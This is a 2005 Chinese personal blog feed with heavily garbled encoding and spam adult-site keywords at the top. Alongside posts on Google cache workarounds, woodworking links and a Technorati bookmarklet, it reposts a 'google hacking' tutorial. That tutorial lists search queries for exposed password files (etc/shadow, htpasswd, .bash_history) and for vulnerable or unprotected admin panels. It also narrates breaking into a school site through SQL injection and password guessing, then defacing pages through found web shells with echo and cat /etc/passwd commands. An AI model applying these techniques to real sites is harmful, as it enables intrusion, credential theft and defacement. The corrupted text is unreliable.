精品三级久久久久久久电影聊斋,久久国产精品电影,亚洲第一se情网站

一些有��的�|�站

Blake HAN — Thu, 08 Sep 2005 09:07:00 GMT

http://www.virtualbartender.beer.com/beer_usa.htm

Blake HAN 2005-09-08 17:07 发表评论

Google�|�页快照��览�Ҏ(gu��)��

Blake HAN — Wed, 07 Sep 2005 03:21:00 GMT

�Ҏ(gu��)��一�Q? 如何跌��ISP对URL的过滤呢�Q�非常简单把最后的ie=UTF-8�q�个参数提到q=cache前面�?�q�样��׃��存在?q=cache�q�个字符串了修改后的�q�接如下�Q? http://216.239.51.100/search?ie=UTF-8&q=ca....org/+&hl=zh-CN 怎么��P��可以用吧。Enjoy it! 如果�q�用不了,�q�有一个办�? http://216.239.51.100/search?q=cache:TOMcQ...=zh-CN&ie=UTF-8 把语�a�改�ؓ(f��)en 或jp��p�� hl=en 有时候可能要多刷几下�? 办法�? http://www.google.com/custom?q=%s 办法�? www.myway.com是一个用google引擎的模仿yahoo的网站，可以看snapshot�? 办法�? http://216.239.33.102/webhp?hl=zh-CN&ie=UTF-8 办法�? http://google.7766.org

Blake HAN 2005-09-07 11:21 发表评论

Blake HAN — Fri, 02 Sep 2005 01:53:00 GMT

准备买齐木匠工具开始做模型…�?br>
攉��一些有用的链接先�?br> http://www.chinahobby.com/moji/lecture01_01.htm
http://tomoyasu.exblog.jp/pg/blog.asp?eid=c0053176&iid=3&acv=&dif=&opt=2&srl=642068&dte=2005%2D02%2D11+05%3A26%3A52%2E000
http://www.copyship.com/BBS/BBS_1024/bbs_index.asp

Blake HAN 2005-09-02 09:53 发表评论

Blake HAN — Fri, 05 Aug 2005 06:21:00 GMT

以下在HACK搜烦界绝�Ҏ(gu��)��l�典中之�l�典�Q�：(x��)

google hacking其实�q�算不上什么新东西,当时�q�没有重视这�U�技�?认�ؓ(f��)webshell什么的,�q�无太大实际用�?google hacking其实�q��

如此��?..

google hacking的简单实�?
使用google中的一些语法可以提供给我们更多的信�?当然也提供给那些�?f��n)惯��d��的�h更多他们所惌��?),下面��来介绍一些常用的语法.
intext:
�q�个��是把网��中的正文内容中的某个字�W�做为搜索条�?例如在google里输�?intext:动网.��返回所有在�|�页正文部分包含"动网"的网��?

.allintext:使用�Ҏ(gu��)��和intext�c�M��.

intitle:
和上面那个intext差不�?搜烦�|�页标题中是否有我们所要找的字�W?例如搜烦:intitle:安全天��.��返回所有网��|��题中包含"安全天��"的网

��?同理allintitle:也同intitle�c�M��.

cache:
搜烦google里关于某些内容的�~�存,有时候也许能扑ֈ�一些好东西�?

define:
搜烦某个词语的定�?搜烦:define:hacker,��返回关于hacker的定�?

filetype:
�q�个我要重点推荐一�?无论是撒�|�式��d��q�是我们后面要说的对�Ԏ��勘杲行畔⑹占�Ҏ(gu��)��玫�U�R��?搜烦指定�c�d��的文�?例如输入

:filetype:doc.��返回所有以doc�l�尾的文件URL.当然如果你找.bak�?mdb�?inc也是可以�?获得的信息也�怼�(x��)更丰�?

info:
查找指定站点的一些基本信�?

inurl:
搜烦我们指定的字�W�是否存在于URL�?例如输入:inurl:admin,��返回N个类��g��q�样的连�?http://www.xxx.com/xxx/admin,用来扄��理员�?

陆的URL不错.allinurl也同inurl�c�M��,可指定多个字�W?

link:
例如搜烦:inurl:www.4ngel.net可以�q�回所有和www.4ngel.net做了链接的URL.

site:
�q�个也很有用,例如:site:www.4ngel.net.��返回所有和4ngel.net�q�个站有关的URL.

对了�q�有一�?作符也是很有用的:
+ 把google可能忽略的字列如查询范围
- 把某个字忽略
~ 同意�?
. 单一的通配�W?
* 通配�W�，可代表多个字�?
"" �_��查询

下面开始说说实际应�?

以下内容均在google上搜�?对于一个居心叵��的��d��者来�?可能他最感兴��的��是密码文�g�?而google正因为其强大的搜索能力往往�?

把一些敏感信息透露�l�他�?用google搜烦以下内容:
intitle:"index of" etc
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
有时候因为各�U�各��L(f��ng)��原因一些重要的密码文�g被毫无保护的暴露在网�l�上,如果被别有用心的��?那么危害是很大的

同样可以用google来搜索一些具有漏�z�的�E�序,例如ZeroBoard前段旉��发现个文件代码泄露漏�z?可以用google来找�|�上使用�q�套�E�序的站

�?
intext:ZeroBoard filetype:php
或者��?
inurlutlogin.php?_zb_path= site:.jp
来寻找我们所需要的��面.phpmyadmin是一套功能强大的数据�?作��Y�?一些站点由于配�|�失�?��D��我们可以不��用密码直接对phpmyadmin�q?

�?�?我们可以用google搜烦存在�q�样漏洞的程序URL:
intitle:phpmyadmin intext:Create new database

�q�记http://www.xxx.com/_vti_bin/..%5 ... ystem32/cmd.exe?dir�?用google找找�Q�你也许�q�可以找到很�?

古董�U�的机器。同��h��们可以用�q�个找找有其他cgi漏洞的页面�?
allinurl�Q�winnt system32

前面已经��单的说过可以用google来搜索数据库文�g,用上一些语法来�_��查找能够获得更多东西(access的数据库,mssql、mysql的连接文�?

�{�等).举个例子�C�Z��一�?
allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
intitle:"index of" data //在一些配�|�不正确的apache+win32的服务器上经常出现这�U�情�?和上面的原理一�?我们�q�可以用google来找�?

�?

利用google完全是可以对一个站点进行信息收集和渗透的�Q�下面我们用google对特定站点进行一�ơ测试�?
首先用google先看�q�个站点的一些基本情�?一些细节部分就略去�?:
site:xxxx.com
从返回的信息中，扑ֈ�几个该校的几个系院的域名�Q?
http://a1.xxxx.com
http://a2.xxxx.com
http://a3.xxxx.com
http://a4.xxxx.com
��Z��ping了一下，应该是在不同的服务器.学校一般都�?x��)有不少好的资料�Q�先看看有什么好东西�?

site:xxxx.com filetype:doc
得到N个不错的doc�?

先找扄��站的��理后台地址�Q?
site:xxxx.com intext:��理
site:xxxx.com inurl:login
site:xxxx.com intitle:��理
��过获得2个管理后台地址�Q?
http://a2.xxxx.com/sys/admin_login.asp
http://a3.xxxx.com:88/_admin/login_in.asp

�q�算不错�Q�看看服务器上跑的是什么程序：(x��)
site:a2.xxxx.com filetype:asp
site:a2.xxxx.com filetype:php
site:a2.xxxx.com filetype:aspx
site:a3.xxxx.com filetype:asp
site:.......
......
a2服务器用的应该是IIS�Q�上面用的是asp的整站程序，�q�有一个php的论�?
a3服务器也是IIS�Q�aspx+asp。web�E�序都应该是自己开发的。有论坛那就看看能不能遇见什么公��q��FTP帐号什么的�Q?
site:a2.xxxx.com intext:ftp://*:*
没找��C��么有价值的东西。再看看有没有上传一�cȝ��漏洞�Q?
site:a2.xxxx.com inurl:file
site:a3.xxxx.com inurl:load
在a2上发��C��个上传文件的��面�Q?
http://a2.xxxx.com/sys/uploadfile.asp
用IE看了一下，没权限访问。试试注��，
site:a2.xxxx.com filetype:asp
得到N个asp��面的地址�Q�体力活��p��软�g做吧�Q�这套程序明显没有对注射做什么防范，dbowner权限�Q�虽然不高但已��矣，back a shell不太�?

�Ƣ，而且看�v来数据库的个头就不小�Q�直接把web��理员的密码暴出来再��_��MD5加密�q�。一般学校的站点的密码都比较有规律，通常都是域名+

�?sh��)话一�cȝ��变�Ş�Q�用google搞定吧�?
site:xxxx.com //得到N个二�U�域�?
site:xxxx.com intext:*@xxxx.com //得到N个邮件地址�Q�还有邮��q��M�h的名字什么的
site:xxxx.com intext:�?sh��)�?//N个电(sh��)�?
把什么的信息做个字典吧，挂上慢慢跑。过了一�D�|��间就跑出4个帐��P��2个是学生�?x��)的�Q?个管理员�Q�还有一个可能是老师的帐受��登陆上去：(x��)
name�Q�网站管理员
pass�Q�a2xxxx7619 //说了吧，��是域名+4个数�?
要再怎么提权那就不属于本文讨��问了�Q�呵呵，到此为止�?

�q�段旉��在国外的一些google hack的研�I�站点看了看�Q�其实也都差不多是一些基本语法的灉|��q�用�Q�或者配合某个脚本漏�z�，主要�q�是�?

个�h的灵�z�L��维。国外对于google hack斚w��的防范也�q�不是很多，所以大家还是点��Cؓ(f��)止，不要��L��破坏拉，呵呵。对于一些在win上跑
apache的网��们应该多注意一下这斚w��Q�一个intitle:index of��差不多都出来了
1.查找利用php webshell

intitle:"php shell*" "Enable stderr" filetype:php

(�? intitle—网��|��?Enable stderr—UNIX标准输出和标准错误的�~�写filetype—文件类�?。搜索结果中�Q�你能找到很多直接在机器上执

行命令的web shell来。如果找到的PHPSHELL不会(x��)利用�Q�如果你不熟�(zh��n)�UNIX�Q�可以直接看看LIST�Q�这里就不详�l�说了，有很多利用�h(hu��n)倹{��要说明

的是�Q�我们这里搜索出来的一些国外的PHPSHELL上都要��用UNIX命��o�Q�都是system调用出来的函�?其实用百度及其他搜烦引擎都可以，只是�?

写搜索的内容不同)。这个PHPWEBSHELL是可以直接Echo(Unix常用命��o)。一句话��把首页搞定�?

echo "召唤" > index.jsp

现在看看首页�Q�已�l�被我们�Ҏ(gu��)��: "召唤" 了�?

我们也可以用WGET上传一个文件上�?比如你要替换的叶子吧)。然后execute Command输入 cat file > index.html or echo "" > file

echo "test" >> file

�q�样一条条打出来，站点首页��成功被替换了。同��L(f��ng)��也可�?

uname -a;cat /etc/passwd

不过有点要注意，有些WEBSHELL�E�序有问题，执行不了的，

2.搜烦INC敏感信息

在google的搜索框中填�?

Code:

.org filetype:inc

在搜索框上输入：(x��) "index of/ " 　inurl:lib
再按搜烦你将�q�入许多图书馆，�q�且一定能下蝲自己喜欢的书�c��?google特别搜烦代码^_^
在搜索框上输入：(x��) "index of/ " 　inurl:lib
再按搜烦你将�q�入许多图书馆，�q�且一定能下蝲自己喜欢的书�c��?

在搜索框上输入：(x��) index of /" 　cnki
再按搜烦你就可以扑ֈ�许多图书馆的CNKI、VIP、超星等入口�Q?br>
在搜索框上输入：(x��)　"index of /" 　ppt
再按搜烦你就可以�H�破�|�站入口下蝲powerpint作品�Q?br>
在搜索框上输入：(x��) "index of /" 　mp3
再按搜烦你就可以�H�破�|�站入口下蝲mp3、rm�{�媄视作品！

在搜索框上输入：(x��)　"index of /" 　swf
再按搜烦你就可以�H�破�|�站入口下蝲flash作品�Q?br>
在搜索框上输入：(x��) "index of /" 　要下载的软�g�?br> 再按搜烦你就可以�H�破�|�站入口下蝲软�g�Q?br>

inurl:"ViewerFrame?Mode="

Blake HAN 2005-08-05 14:21 发表评论

Blake HAN — Thu, 04 Aug 2005 01:46:00 GMT

摘要: �|�络�l�典命��o�?1) FOR Windows 2k/2003 Server 1.最基本�Q�最常用的，��试物理�|�络�?ping 192.168.10.88 �Q�t �Q�参敎ͼ�t是等待用户去中断��试 2.查看DNS、IP、Mac�{?A.Win98�Q�winipcfg B.Win2000以上�Q�Ipconfig/all C.NSLOOKUP�Q�如查看沛_��的DNS C:\>nslookup Default Se... 阅读全文

Blake HAN 2005-08-04 09:46 发表评论

一�Ƒ֥�用的囑�Ş转换软�g

Blake HAN — Wed, 06 Jul 2005 08:46:00 GMT

摘要: 今天无意中发��C��一�Ƒ֥�用的囑�Ş转换软�g�Q�可以把囄��转成HTML和TXT。这里下载P {FONT-SIZE: 8pt; FONT-FAMILY: "宋体"} A:link {COLOR: #cccccc; TEXT-DECORATION: none} A:visited {TEXT-DECORATION: none} A:active {TEXT-DECORATION: none} A:ho... 阅读全文

Blake HAN 2005-07-06 16:46 发表评论

Google可以查病毒？

Blake HAN — Thu, 16 Jun 2005 08:31:00 GMT

今天在Google Search的时候，�H�然Google转向��C��一个错误页面。仔�l�一看，居然说我的机器中毒了
再次查询的时候又好了�Q�难道Google真的有了��查病毒的功能�Q?BR>
附上截图�Q?BR>

Technorati Tags: Google

Blake HAN 2005-06-16 16:31 发表评论

Blake HAN — Tue, 14 Jun 2005 09:55:00 GMT

好不�Ҏ(gu��)��我的blog被加入Google index了，但是在往��面上加Google search bar的时候，标签被自动过滤掉�?IMG height=19 src="http://www.aygfsteel.com/Emoticons/cry_smile.gif" width=19 border=0>。dudu�l�我一个解��x��案吧�Q?IMG height=20 src="http://www.aygfsteel.com/Emoticons/QQ/icon16.gif" width=20 border=0>

原代码：(x��)

<legend><A HREF="http://www.google.com/">
<IMG SRC="http://www.google.com/logos/Logo_25wht.gif"
border="0" ALT="Google">A>legend>
<FORM method=GET action="http://www.google.com/search">
<INPUT TYPE=hidden name=ie value=GB2312>
=hidden name=oe value=GB2312>
=hidden name="hl" value="zh-CN">
<INPUT TYPE=text name=q maxlength=255 value="">
<font size=-1>
=hidden name=domains value="Treacle"><br>
<INPUT TYPE=radio name=sitesearch value=""> WWW
<INPUT TYPE=radio name=sitesearch value="http://www.aygfsteel.com/blake" checked> Treacle <br>
font>
<INPUT TYPE=submit name=btnG VALUE="Google Search">
FORM>
fieldset>

应有效果�Q?BR>

WWW Treacle

Blake HAN 2005-06-14 17:55 发表评论

How to add Technorati tag quickly!

Blake HAN — Wed, 08 Jun 2005 14:25:00 GMT

Just add "Technorati Tags: ';for(var i=0;i 0){a+=' | ';}a+=''+tr[i]+'';}a+='

';prompt('Copy this code, press OK, then paste to your blog entry:',a);})()">Gen Tag" to FireFox bookmark.
But this is customized to myself, if you want to use it, you can do some modification.

Here is the source code:

1javascript:(
2function() {
3  var a='';
4  var t=prompt('Enter Tags:','');
5  var addr=prompt('Enter page url:','');
6  var tr=t.split(' ');
7  a+='<P><span class='+unescape('%22')+'technoratitag'
8      +unescape('%22')+'>Technorati Tags: ';
9  for(var i=0;i<tr.length;i++) {
10    if(i > 0) {
11      a+=' | ';
12    }
13    a+='<a href='+unescape('%22')+'http://www.technorati.com/tags/'
14        +tr[i]+unescape('%22')+' rel='+unescape('%22')+'tag'
15        +unescape('%22')+'>'+tr[i]+'a>';
16  }
17  a+='span> <a href=%22http://www.technorati.com/ping.html?url='
18      +addr+'%22><img src=%22http://www.aygfsteel.com/images/'
19      +'blogjava_net/blake/Misc/bubble_h17.gif%22 border=%220%22/>a>P>';
20  prompt('Copy this code, press OK, then paste to your blog entry:',a);
21})()

I didn't find a good way to do it in Microsoft IE, maybe need write some tools to generate it. If anybody knows, please tell me. Thanks

Technorati Tags: Technorati | Tag | FireFox

Blake HAN 2005-06-08 22:25 发表评论